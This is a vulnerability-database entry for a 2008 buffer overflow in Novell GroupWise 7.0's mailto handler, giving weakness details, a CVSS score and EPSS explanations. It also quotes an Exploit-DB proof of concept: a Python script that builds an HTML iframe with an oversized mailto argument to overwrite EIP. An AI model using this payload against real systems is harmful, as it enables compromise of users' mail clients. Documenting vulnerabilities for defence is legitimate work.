Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-119 |
Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
9.3 |
|
AV:N/AC:M/Au:N/C:C/I:C/A:C |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 5515
Publication date : 2008-04-27 22h00 +00:00
Author : Juan Yacubian
EDB Verified : Yes
PRODUCT: GroupWise 7.0
OS: Windows Xp
The scheme "mailto" is vulnerable if one takes as default mail client to
GroupWise, the fault is to implement the scheme followed by an extensive
argument and this causes the buffer overflow. This brings the consequence that
can overwrite the EIP and is able to execute arbitrary code. The result with a
debbuger us what reveals.
Access violation when executing [41414141]
What power is that vulnerability to attach a html file which is included in an
iframe with the scheme badly formed runs only watch.
proof of concept
#!/usr/bin/python
a = "<iframe src='mailto:"
a += "A" * 1530
a += "\x61\x61\x61\x61"
a += "' width='320' height='300' scrolling='yes' name='content'></iframe>"
file = open("test.html", "w")
file.write(a)
file.close()
greetings!
Juan Pablo Lopez Yacubian
# milw0rm.com [2008-04-28]
Products Mentioned
Configuraton 0
Novell>>Groupwise >> Version 7.0
Novell>>Groupwise >> Version 7.0
Novell>>Groupwise >> Version 7.0
Novell>>Groupwise >> Version 7.0
References